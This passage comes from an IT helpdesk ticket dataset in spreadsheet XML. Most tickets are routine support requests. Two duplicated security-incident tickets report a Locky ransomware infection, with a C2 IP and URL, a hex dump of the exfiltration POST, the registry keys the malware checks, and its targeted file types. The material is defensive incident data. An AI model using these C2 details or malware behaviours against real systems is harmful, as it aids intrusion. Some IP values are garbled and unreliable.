103955_x000d__x000a_foreseeconndirection = internal_x000d__x000a_srcassetofinterest = 264_x000d__x000a_srcport = 56840_x000d__x000a__x000d__x000a__x000d__x000a_occurrence count: 226_x000d__x000a_event count: 2_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_aug 3 17:48:47 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56843 dst outside:192.168.0.5/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:56 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56874 dst outside:192.168.254.16/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:48:59 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56892 dst outside:192.168.86.169/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:02 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56913 dst outside:192.168.1.70/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:05 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56930 dst outside:192.168.6.154/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:11 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56958 dst outside:192.168.54.65/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:19 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56975 dst outside:192.168.68.106/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:22 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/56984 dst outside:192.168.43.240/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:30 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57011 dst outside:192.168.254.28/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57026 dst outside:192.168.1.37/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:33 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57027 dst outside:192.168.0.11/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57037 dst outside:192.168.1.105/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:36 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57038 dst outside:192.168.0.20/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:52 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57066 dst outside:192.168.1.11/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:49:55 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57087 dst outside:192.168.1.71/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]_x000d__x000a_aug 3 17:50:01 54.96.80.216 %asa-4-106023: deny tcp src inside:29.26.13.3095/57127 dst outside:192.168.1.139/445 by access-group &quot;acl_inside&quot; [0x0, 0x0]"/>
    <s v="gzhapcld fdigznbk"/>
    <x v="11"/>
  </r>
  <r>
    <s v="security incidents - ( sw #in33544563 ) : possible locky ransomware infection - lpal9516827 / 45.25.35.0499"/>
    <s v="source ip : 45.25.35.0499_x000a_system name : lpal9516827_x000a_user  name: sbinuxja vtbegcho (nicolmghyu)_x000a_location : /centralsamerirtca/south_amerirtca/fieldsales-vpn-pcs_x000a_sep , sms status : see below_x000a_field sales user ( yes / no) : no_x000a_dsw event log: see below_x000a__x000a_**_x000a__x000a_content versions_x000a_fmxcnwpu tcwrdqboinition version: 08/07/2016 r19 _x000a_sequence: 179810 _x000a_host integrity content: 10/28/2015 r1 _x000a_reputation settings: 03/02/2015 r5 _x000a_ap portal list: 11/11/2015 r22 _x000a_intrusion prevention signature: 08/05/2016 r11 _x000a_power eraser definitions: 10/28/2015 r36 _x000a_revocation content: 08/03/2016 r2 _x000a_eraser engine: 115.2.1.18 _x000a_sonar content: 07/18/2016 r1 _x000a_extended file attributes and signatures: 08/04/2016 r3 _x000a_symantec permitted applications list: 08/05/2016 r22 _x000a__x000a_**_x000a__x000a_sonar and risk logs_x000a__x000a_risk information_x000a_downloaded or created by: c:\programdnty files (x86)\java\jre1.8.0_101\bin\javaw.exe _x000a_file or path: c:\users\nicolmghyu\202b4bcc-bddb48f94-1\9940ef2a-b.exe   _x000a_application: 9940ef2a-b.exe _x000a_application type: not applicable _x000a_category set: malware _x000a_category type: heuristic virus _x000a_version: 1.0.0.0 _x000a_file size: 3332167 _x000a_hash: 1c9fca98197534681661982b366668541fa6f8d5f6480a64ffddfee7fbf502d5 _x000a_hash algorithm: sha-256 _x000a__x000a_risk reputation_x000a_first seen: symantec has known about this file approximately 2 days. _x000a_reputation: this file is untrustworthy. _x000a_prevalence: this file has been seen by fewer than 5 symantec users. _x000a_sonar risk level: high _x000a_sensitivity:  1 (low) _x000a_detection score: 1 _x000a_sonar engine version: 10.1.0.96 _x000a_submit: not recommended to submit _x000a__x000a_**_x000a__x000a_=========================_x000a_incident overview_x000a_=========================_x000a_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_x000a__x000a__x000a_the outbound http traffic from the infected device contained the following method data:_x000a_protocol: tcp_x000a_http method: post_x000a_http version: http/1.0_x000a_domain: 81.4.108.247_x000a_url path: /comercial/cadastra.php_x000a_user-agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000a_content length: 127_x000a__x000a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a_1) ticket only escalation for related events (medium priority ticket and an e-mail only notification)._x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000a__x000a_sincerely,_x000a_secureworks ctoc_x000a__x000a__x000a_=========================_x000a_technical details_x000a_=========================_x000a_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quot;inwarehouse_tool_j-&quot;. a potential victim receiving the attachment needs to open it and enable the macro which will then initiate the payload download over http._x000a__x000a_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_x000a__x000a_locky also checks for the following registry keys, which may indicate the presence of security-related software:_x000a_â€¢ software\kasperskylab_x000a_â€¢ software\eset_x000a_â€¢ software\avast software_x000a__x000a_the victim is notified of the infection when the desktop background image changes (see figure 4 in ctu tips). locky places the same instructions in a text file and a bitmap image on the desktop and displays both of these files to the victim._x000a__x000a_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_x000a__x000a_locky may also have the capability to locate network resources and encrypt files in those locations. ctu researchers are analysing a block of code that may be used to enumerate network-based locations (2016-02-19)._x000a__x000a_locky attempts encryption on the following files and file types:_x000a_   _x000a_.qcow2_x000a_.vmdk_x000a_.tar_x000a_.bz2_x000a_.jpeg_x000a_.sqlite3_x000a_.ppsm_x000a_.potm_x000a_.xlsx_x000a_.docm_x000a_wallet.dat_x000a_.xlsm_x000a_.xlsb_x000a_.dotm_x000a_.dotx_x000a_.docx _x000a_.djvu_x000a_.pptx_x000a_.pptm_x000a_.xltx _x000a_.xltm_x000a_.ppsx_x000a_.ppam_x000a_.docb_x000a_.potx_x000a_.lay6_x000a_.mSID_33_x000a_.sldm_x000a_.sldx_x000a_.tiff_x000a_.class_x000a_.java _x000a_.sqlitedb_x000a__x000a__x000a_=========================_x000a_references_x000a_========================= _x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a__x000a_=========================_x000a_event data_x000a_=========================_x000a__x000a_event id: 304325068_x000a_event summary: 52655 vid74472 locky ransomware c2 communication outbound_x000a_occurrence count: 1_x000a_event count: 1_x000a__x000a_host and connection information_x000a_source ip: 45.25.35.0499_x000a_source hostname: lpal9516827_x000a_source port: 65360_x000a_destination ip: 81.4.108.247_x000a_destination hostname: ha6.ru._x000a_destination port: 80_x000a_destination ip geolocation: geffen, nld_x000a_connection directionality: outgoing_x000a_http method: post_x000a_user agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000a_host: 81.4.108.247_x000a_full url path: /comercial/cadastra.php_x000a__x000a_device information_x000a_device ip: 10.32.100.17_x000a_device name: isensor03.company.com_x000a_log time: 2016-08-08 at 18:49:36 utc_x000a_action: not blocked_x000a_vendor eventid: 349194_x000a_cvss score: -1 _x000a_vendor priority: 1_x000a_vendor version: 7_x000a__x000a_scwx event processing information_x000a_sherlock rule id (sle): 2114736_x000a_inspector rule id: 277082_x000a_inspector event id: 031975724_x000a_ontology id: 200020003203758352_x000a_event type id: 200020003203696566_x000a_agent id: 102805_x000a__x000a_event detail:_x000a_[**] [1:21163766:6] 52655 vid74472 locky ransomware c2 communication outbound [**]_x000a_[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000a_[sensor id: 602982][event id: 349194][time: 2581793287.437864]_x000a_[src ip: 45.25.35.0499][dst ip: 81.4.108.247][sport/itype: 65360][dport/icode: 80][proto: 6]_x000a_08/08/2016-18:49:36.437864 45.25.35.0499:65360 -&gt; 81.4.108.247:80_x000a_tcp ttl:124 tos:0x0 id:10107 iplen:20 dgmlen:408 df_x000a_***ap*** seq: 0x85a5dbff  ack: 0xb770f7f2  win: 0x102  tcplen: 20_x000a_==pcap 1==_x000a__x000a__x000a_[ex http_uri 9: /comercial/cadastra.php]_x000a__x000a_[ex http_hostname 10: 81.4.108.247]_x000a__x000a_[o:security]_x000a__x000a_ascii packet(s):_x000a_==pcap 1 ascii s==_x000a_....@..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_x000a_==pcap 1 ascii e==_x000a__x000a_hex packet(s):_x000a_==pcap 1 hex s==_x000a_000000    0c00 0000 40d4 a857 68ae 0600 9801 0000    ....@..wh......._x000a_000010    9801 0000 4500 0198 277b 4000 7c06 c31e    ....e...'{@.|..._x000a_000020    0a2c 4a9f 5104 6cf7 ff50 0050 85a5 dbff    .,j.q.l..p.p...._x000a_000030    b770 f7f2 5018 0102 93f3 0000 504f 5354    .p..p.......post_x000a_000040    202f 434f 4d45 5243 4941 4c2f 6361 6461    ./comercial/cada_x000a_000050    7374 7261 2e70 6870 2048 5454 502f 312e    stra.php.http/1._x000a_000060    300d 0a48 6f73 743a 2038 312e 342e 3130    0..host:.81.4.10_x000a_000070    382e 3234 370d 0a4b 6565 702d 416c 6976    8.247..keep-aliv_x000a_000080    653a 2033 3030 0d0a 436f 6e6e 6563 7469    e:.300..connecti_x000a_000090    6f6e 3a20 6b65 6570 2SID_26 6c69 7665 0d0a    on:.keep-alive.._x000a_0000a0    5573 6572 2SID_29 6765 6e74 3a20 4d6f 7a69    user-agent:.mozi_x000a_0000b0    6c6c 612f 352e 3020 2863 6f6d 7061 7469    lla/5.0.(compati_x000a_0000c0    626c 653b 204d 5349 4520 362e 303b 2057    ble;.msie.6.0;.w_x000a_0000d0    696e 646f 7773 204e 5420 352e 313b 2053    indows.nt.5.1;.s_x000a_0000e0    5632 290d 0a43 6f6e 7465 6e74 2d54 7970    v2)..content-typ_x000a_0000f0    653a 2061 7070 6c69 6361 7469 6f6e 2f78    e:.application/x_x000a_000100    2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63    -www-form-urlenc_x000a_000110    6f64 6564 0d0a 436f 6e74 656e 742d 4c65    oded..content-le_x000a_000120    6e67 7468 3a20 3132 370d 0a0d 0a4e 4f4d    ngth:.127....nom_x000a_000130    453d 4c50 414c 3834 3035 3731 3626 534f    e=lpal9516827&amp;so_x000a_000140    3d57 494e 3130 2644 4154 413d 3038 2f30    =win10&amp;data=08/0_x000a_000150    382f 3230 3136 2031 353a 3439 3a33 3626    8/2016.15:49:36&amp;_x000a_000160    5653 3d39 2649 4449 4f4d 413d 506f 7274    vs=9&amp;idioma=port_x000a_000170    7567 75ea 7320 2842 7261 7369 6c29 2641    ugu.s.(south_amerirtca)&amp;a_x000a_000180    4e54 493d 7b57 494e 444f 5753 7d20 2650    nti={windows}.&amp;p_x000a_000190    4c55 4749 4e3d 2d49 5426 4944 4358 3d43    lugin=-it&amp;idcx=c_x000a_0001a0    584c 5b30 322d 3038 2d31 365d              xl[02-08-16]_x000a_==pcap 1 hex e=="/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to connect with vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ivohcdpw.ixcanwbm@gmail.com_x000d__x000a__x000d__x000a_dear sir,_x000d__x000a__x000d__x000a_i am trying to connect with virtual private network through _x000d__x000a__x000d__x000a_please do the need full . tomorrow at 1400 hrs i will be free  by 0900hrs to 1330hrs i will be inside govt. factory and laptop and mobile is not allowed ._x000d__x000a__x000d__x000a__x000d__x000a_with best "/>
    <s v="ivohcdpw ixcanwbm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="xceliron process not working - inwarehouse_tools are blocking due to missing goods receipt."/>
    <s v="xceliron process not working - inwarehouse_tools are blocking due to missing goods receipt. vendor is routinely not getting paid because of no goods receipt.  asuenpyg vzmneycx created process whereby the goods receipts were to be done via the system.  this process is not working."/>
    <s v="xkmvpaei fizqoprk"/>
    <x v="29"/>
  </r>
  <r>
    <s v="abended job in job_scheduler: bkbackup_tool_HostName_770_prod_inc"/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_ abended job in job_scheduler: bkbackup_tool_HostName_770_prod_inc at 08/09/16 12:56:26"/>
    <s v="ZkBogxib QsEJzdZO"/>
    <x v="4"/>
  </r>
  <r>
    <s v="lhqw8325925sf: usa-nologin-collaboration_platform: script returned unexpected value 3."/>
    <s v="lhqw8325925sf: usa-nologin-collaboration_platform: script returned unexpected value 3. "/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="7"/>
  </r>
  <r>
    <s v="security incidents - ( sw #in33544563 ) : possible locky ransomware infection - lpal9516827 / 45.25.35.0499"/>
    <s v="source ip : 45.25.35.0499_x000d__x000a_system name : lpal9516827_x000d__x000a_user  name: sbinuxja vtbegcho (nicolmghyu)_x000d__x000a_location : /centralsamerirtca/south_amerirtca/fieldsales-vpn-pcs_x000d__x000a_sep , sms status : see below_x000d__x000a_field sales user ( yes / no) : no_x000d__x000a_dsw event log: see below_x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_content versions_x000d__x000a_fmxcnwpu tcwrdqboinition version: 08/07/2016 r19 _x000d__x000a_sequence: 179810 _x000d__x000a_host integrity content: 10/28/2015 r1 _x000d__x000a_reputation settings: 03/02/2015 r5 _x000d__x000a_ap portal list: 11/11/2015 r22 _x000d__x000a_intrusion prevention signature: 08/05/2016 r11 _x000d__x000a_power eraser definitions: 10/28/2015 r36 _x000d__x000a_revocation content: 08/03/2016 r2 _x000d__x000a_eraser engine: 115.2.1.18 _x000d__x000a_sonar content: 07/18/2016 r1 _x000d__x000a_extended file attributes and signatures: 08/04/2016 r3 _x000d__x000a_symantec permitted applications list: 08/05/2016 r22 _x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_sonar and risk logs_x000d__x000a__x000d__x000a_risk information_x000d__x000a_downloaded or created by: c:\programdnty files (x86)\java\jre1.8.0_101\bin\javaw.exe _x000d__x000a_file or path: c:\users\nicolmghyu\202b4bcc-bddb48f94-1\9940ef2a-b.exe   _x000d__x000a_application: 9940ef2a-b.exe _x000d__x000a_application type: not applicable _x000d__x000a_category set: malware _x000d__x000a_category type: heuristic virus _x000d__x000a_version: 1.0.0.0 _x000d__x000a_file size: 3332167 _x000d__x000a_hash: 1c9fca98197534681661982b366668541fa6f8d5f6480a64ffddfee7fbf502d5 _x000d__x000a_hash algorithm: sha-256 _x000d__x000a__x000d__x000a_risk reputation_x000d__x000a_first seen: symantec has known about this file approximately 2 days. _x000d__x000a_reputation: this file is untrustworthy. _x000d__x000a_prevalence: this file has been seen by fewer than 5 symantec users. _x000d__x000a_sonar risk level: high _x000d__x000a_sensitivity:  1 (low) _x000d__x000a_detection score: 1 _x000d__x000a_sonar engine version: 10.1.0.96 _x000d__x000a_submit: not recommended to submit _x000d__x000a__x000d__x000a_**_x000d__x000a__x000d__x000a_=========================_x000d__x000a_incident overview_x000d__x000a_=========================_x000d__x000a_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_x000d__x000a__x000d__x000a__x000d__x000a_the outbound http traffic from the infected device contained the following method data:_x000d__x000a_protocol: tcp_x000d__x000a_http method: post_x000d__x000a_http version: http/1.0_x000d__x000a_domain: 81.4.108.247_x000d__x000a_url path: /comercial/cadastra.php_x000d__x000a_user-agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000d__x000a_content length: 127_x000d__x000a__x000d__x000a__x000d__x000a_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d__x000a_1) ticket only escalation for related events (medium priority ticket and an e-mail only notification)._x000d__x000a_2) autoresolve events to the portal (no explicit notification but events will be available for reporting purposes in the portal)._x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_secureworks ctoc_x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_technical details_x000d__x000a_=========================_x000d__x000a_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quot;inwarehouse_tool_j-&quot;. a potential victim receiving the attachment needs to open it and enable the macro which will then initiate the payload download over http._x000d__x000a__x000d__x000a_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_x000d__x000a__x000d__x000a_locky also checks for the following registry keys, which may indicate the presence of security-related software:_x000d__x000a_â€¢ software\kasperskylab_x000d__x000a_â€¢ software\eset_x000d__x000a_â€¢ software\avast software_x000d__x000a__x000d__x000a_the victim is notified of the infection when the desktop background image changes (see figure 4 in ctu tips). locky places the same instructions in a text file and a bitmap image on the desktop and displays both of these files to the victim._x000d__x000a__x000d__x000a_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_x000d__x000a__x000d__x000a_locky may also have the capability to locate network resources and encrypt files in those locations. ctu researchers are analysing a block of code that may be used to enumerate network-based locations (2016-02-19)._x000d__x000a__x000d__x000a_locky attempts encryption on the following files and file types:_x000d__x000a_   _x000d__x000a_.qcow2_x000d__x000a_.vmdk_x000d__x000a_.tar_x000d__x000a_.bz2_x000d__x000a_.jpeg_x000d__x000a_.sqlite3_x000d__x000a_.ppsm_x000d__x000a_.potm_x000d__x000a_.xlsx_x000d__x000a_.docm_x000d__x000a_wallet.dat_x000d__x000a_.xlsm_x000d__x000a_.xlsb_x000d__x000a_.dotm_x000d__x000a_.dotx_x000d__x000a_.docx _x000d__x000a_.djvu_x000d__x000a_.pptx_x000d__x000a_.pptm_x000d__x000a_.xltx _x000d__x000a_.xltm_x000d__x000a_.ppsx_x000d__x000a_.ppam_x000d__x000a_.docb_x000d__x000a_.potx_x000d__x000a_.lay6_x000d__x000a_.mSID_33_x000d__x000a_.sldm_x000d__x000a_.sldx_x000d__x000a_.tiff_x000d__x000a_.class_x000d__x000a_.java _x000d__x000a_.sqlitedb_x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_references_x000d__x000a_========================= _x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_=========================_x000d__x000a_event data_x000d__x000a_=========================_x000d__x000a__x000d__x000a_event id: 304325068_x000d__x000a_event summary: 52655 vid74472 locky ransomware c2 communication outbound_x000d__x000a_occurrence count: 1_x000d__x000a_event count: 1_x000d__x000a__x000d__x000a_host and connection information_x000d__x000a_source ip: 45.25.35.0499_x000d__x000a_source hostname: lpal9516827_x000d__x000a_source port: 65360_x000d__x000a_destination ip: 81.4.108.247_x000d__x000a_destination hostname: ha6.ru._x000d__x000a_destination port: 80_x000d__x000a_destination ip geolocation: geffen, nld_x000d__x000a_connection directionality: outgoing_x000d__x000a_http method: post_x000d__x000a_user agent: mozilla/5.0 (compatible; msie 6.0; windows nt 5.1; sv2)_x000d__x000a_host: 81.4.108.247_x000d__x000a_full url path: /comercial/cadastra.php_x000d__x000a__x000d__x000a_device information_x000d__x000a_device ip: 10.32.100.17_x000d__x000a_device name: isensor03.company.com_x000d__x000a_log time: 2016-08-08 at 18:49:36 utc_x000d__x000a_action: not blocked_x000d__x000a_vendor eventid: 349194_x000d__x000a_cvss score: -1 _x000d__x000a_vendor priority: 1_x000d__x000a_vendor version: 7_x000d__x000a__x000d__x000a_scwx event processing information_x000d__x000a_sherlock rule id (sle): 2114736_x000d__x000a_inspector rule id: 277082_x000d__x000a_inspector event id: 031975724_x000d__x000a_ontology id: 200020003203758352_x000d__x000a_event type id: 200020003203696566_x000d__x000a_agent id: 102805_x000d__x000a__x000d__x000a_event detail:_x000d__x000a_[**] [1:21163766:6] 52655 vid74472 locky ransomware c2 communication outbound [**]_x000d__x000a_[classification: none] [priority: 1] [action: accept_passive] [impact_flag: 0] [impact: 0] [blocked: 2] [vlan: 0] [mpls label: 0] [pad2: 1]_x000d__x000a_[sensor id: 602982][event id: 349194][time: 2581793287.437864]_x000d__x000a_[src ip: 45.25.35.0499][dst ip: 81.4.108.247][sport/itype: 65360][dport/icode: 80][proto: 6]_x000d__x000a_08/08/2016-18:49:36.437864 45.25.35.0499:65360 -&gt; 81.4.108.247:80_x000d__x000a_tcp ttl:124 tos:0x0 id:10107 iplen:20 dgmlen:408 df_x000d__x000a_***ap*** seq: 0x85a5dbff  ack: 0xb770f7f2  win: 0x102  tcplen: 20_x000d__x000a_==pcap 1==_x000d__x000a__x000d__x000a__x000d__x000a_[ex http_uri 9: /comercial/cadastra.php]_x000d__x000a__x000d__x000a_[ex http_hostname 10: 81.4.108.247]_x000d__x000a__x000d__x000a_[o:security]_x000d__x000a__x000d__x000a_ascii packet(s):_x000d__x000a_==pcap 1 ascii s==_x000d__x000a_....@..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_x000d__x000a_==pcap 1 ascii e==_x000d__x000a__x000d__x000a_hex packet(s):_x000d__x000a_==pcap 1 hex s==_x000d__x000a_000000    0c00 0000 40d4 a857 68ae 0600 9801 0000    ....@..wh......._x000d__x000a_000010    9801 0000 4500 0198 277b 4000 7c06 c31e    ....e...'{@.|..._x000d__x000a_000020    0a2c 4a9f 5104 6cf7 ff50 0050 85a5 dbff    .,j.q.l..p.p...._x000d__x000a_000030    b770 f7f2 5018 0102 93f3 0000 504f 5354    .p..p.......post_x000d__x000a_000040    202f 434f 4d45 5243 4941 4c2f 6361 6461    ./comercial/cada_x000d__x000a_000050    7374 7261 2e70 6870 2048 5454 502f 312e    stra.php.http/1._x000d__x000a_000060    300d 0a48 6f73 743a 2038 312e 342e 3130    0..host:.81.4.10_x000d__x000a_000070    382e 3234 370d 0a4b 6565 702d 416c 6976    8.247..keep-aliv_x000d__x000a_000080    653a 2033 3030 0d0a 436f 6e6e 6563 7469    e:.300..connecti_x000d__x000a_000090    6f6e 3a20 6b65 6570 2SID_26 6c69 7665 0d0a    on:.keep-alive.._x000d__x000a_0000a0    5573 6572 2SID_29 6765 6e74 3a20 4d6f 7a69    user-agent:.mozi_x000d__x000a_0000b0    6c6c 612f 352e 3020 2863 6f6d 7061 7469    lla/5.0.(compati_x000d__x000a_0000c0    626c 653b 204d 5349 4520 362e 303b 2057    ble;.msie.6.0;.w_x000d__x000a_0000d0    696e 646f 7773 204e 5420 352e 313b 2053    indows.nt.5.1;.s_x000d__x000a_0000e0    5632 290d 0a43 6f6e 7465 6e74 2d54 7970    v2)..content-typ_x000d__x000a_0000f0    653a 2061 7070 6c69 6361 7469 6f6e 2f78    e:.application/x_x000d__x000a_000100    2d77 7777 2d66 6f72 6d2d 7572 6c65 6e63    -www-form-urlenc_x000d__x000a_000110    6f64 6564 0d0a 436f 6e74 656e 742d 4c65    oded..content-le_x000d__x000a_000120    6e67 7468 3a20 3132 370d 0a0d 0a4e 4f4d    ngth:.127....nom_x000d__x000a_000130    453d 4c50 414c 3834 3035 3731 3626 534f    e=lpal9516827&amp;so_x000d__x000a_000140    3d57 494e 3130 2644 4154 413d 3038 2f30    =win10&amp;data=08/0_x000d__x000a_000150    382f 3230 3136 2031 353a 3439 3a33 3626    8/2016.15:49:36&amp;_x000d__x000a_000160    5653 3d39 2649 4449 4f4d 413d 506f 7274    vs=9&amp;idioma=port_x000d__x000a_000170    7567 75ea 7320 2842 7261 7369 6c29 2641    ugu.s.(south_amerirtca)&amp;a_x000d__x000a_000180    4e54 493d 7b57 494e 444f 5753 7d20 2650    nti={windows}.&amp;p_x000d__x000a_000190    4c55 4749 4e3d 2d49 5426 4944 4358 3d43    lugin=-it&amp;idcx=c_x000d__x000a_0001a0    584c 5b30 322d 3038 2d31 365d              xl[02-08-16]_x000d__x000a_==pcap 1 hex e=="/>
    <s v="ugyothfz ugrmkdhx"/>
    <x v="62"/>
  </r>
  <r>
    <s v="engineering tool"/>
    <s v="engineering tool stops working several times a day, falls without apparent reason and works slow when it succeeds stay running._x000d__x000a_please see attached a print screen of the error._x000d__x000a_"/>
    <s v="fegahzqx bkeqfvpl"/>
    <x v="62"/>
  </r>
  <r>
    <s v="abend batch job in job_scheduler :bkbackup_tool_HostName_770_prod_inc"/>
    <s v="job name:bkbackup_tool_HostName_770_prod_inc"/>
    <s v="oldrctiu bxurpsyi"/>
    <x v="4"/>
  </r>
  <r>
    <s v="please move client from office 2010 to 2016 per sdxjiwlq ynowzqfh"/>
    <s v="please move client from office 2010 to 2016 per sdxjiwlq ynowzqfh"/>
    <s v="xzwlnbfo plstfydx"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="rxoqczbj glanwbvu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket_no1539670 - ticket update"/>
    <s v="ticket_no1539670 - ticket update"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please instal printer pa15 at these laptop"/>
    <s v="please instal printer pa15 at these laptop"/>
    <s v="zuyimtsf qjtimdsp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="restore a file"/>
    <s v="_x000d__x000a__x000d__x000a_received from: nwbhomqe.ejavblzu@gmail.com_x000d__x000a__x000d__x000a_hello help,_x000d__x000a__x000d__x000a_please restore the excel file &quot;sc drill catalog 2016-05-31&quot;_x000d__x000a_from my home drive o:\solid carbide drills&lt;file:///\\eagclhome\martif1$\solid%20carbide%20drills&gt;_x000d__x000a_from yesterday._x000d__x000a__x000d__x000a_"/>
    <s v="nwbhomqe ejavblzu"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to connect to wifi from a hotel // dell 7350"/>
    <s v="unable to connect to wifi from a hotel // dell 7350"/>
    <s v="imoelsap gxdwkimv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="access to insertapps and corporate technology drives"/>
    <s v="_x000d__x000a__x000d__x000a_received from: uterqfld.ufmtgndo@gmail.com_x000d__x000a__x000d__x000a_who would i contact at corporate to get access for ldpequhm nqclatbw and alex campbell to the following servers_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_teams://HostName_771/tech center grade specifications/ceramdntyic specs_x000d__x000a__x000d__x000a_access is needed to support manufacturing and technology._x000d__x000a__x000d__x000a_"/>
    <s v="zrbxcndu lxrsoenp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="audio not working on dell 7350 tablet"/>
    <s v="audio not working on dell 7350 tablet"/>
    <s v="nyjvwsxf npwoglzf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to create reports in ticketing_tool"/>
    <s v="i am unable to create/save new reports in ticketing_tool. "/>
    <s v="qfrntose ivnhumzj"/>
    <x v="35"/>
  </r>
  <r>
    <s v="unable to boot up the laptop"/>
    <s v="unable to boot up the laptop"/>
    <s v="oewshlmd azjfshry"/>
    <x v="2"/>
  </r>
  <r>
    <s v="unable to sign in to skype and outlook"/>
    <s v="unable to sign in to skype and outlook"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="HostName_1132:wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1"/>
    <s v="HostName_1132:epmsystem2.exe: wrong number of instances of process *epmsystem2.exe*, expected 2 - found 1"/>
    <s v="jyoqwxhz clhxsoqy"/>
    <x v="11"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="password reset"/>
    <s v="tjlizqgc ngvwoukp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error in customer"/>
    <s v="_x000d__x000a__x000d__x000a_received from: aiobpkzm.rmfjwtpl@gmail.com_x000d__x000a__x000d__x000a_good morning_x000d__x000a__x000d__x000a_the customer 81908859, must to include the next data:_x000d__x000a_dana manufacturing luxembourg_x000d__x000a_division enco / immex 488-2007_x000d__x000a_vat reg. no. lu38092497_x000d__x000a_dmc750410c41_x000d__x000a__x000d__x000a_but know we have these one:_x000d__x000a_dana de mexico corporacion mexico srl_x000d__x000a_de cv / division enco / immex 488-2007_x000d__x000a_vat reg. no. lu38092497_x000d__x000a_dmc750410c41_x000d__x000a_and these data is wrong._x000d__x000a__x000d__x000a_[cid:image003.png@01d1f222.eSID_5356b0][cid:image002.png@01d1f222.cb378bc0]_x000d__x000a__x000d__x000a_what can i do to get the real information_x000d__x000a__x000d__x000a_this information is in the customer_x000d__x000a__x000d__x000a_[cid:image004.png@01d1f222.eSID_5356b0]_x000d__x000a__x000d__x000a_please let me know if you can help me_x000d__x000a__x000d__x000a_"/>
    <s v="aiobpkzm rmfjwtpl"/>
    <x v="9"/>
  </r>
  <r>
    <s v="account locked out"/>
    <s v="account locked out"/>
    <s v="vfrdxtqw jfbmsenz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="hub home page regional news does not have amerirtcas option"/>
    <s v="see att"/>
    <s v="gvxfymjk euioadyf"/>
    <x v="15"/>
  </r>
  <r>
    <s v="issues with internet explorer which is freezing all the time"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jnqmvard.jiazxvcl@gmail.com_x000d__x000a__x000d__x000a_"/>
    <s v="jnqmvard jiazxvcl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset "/>
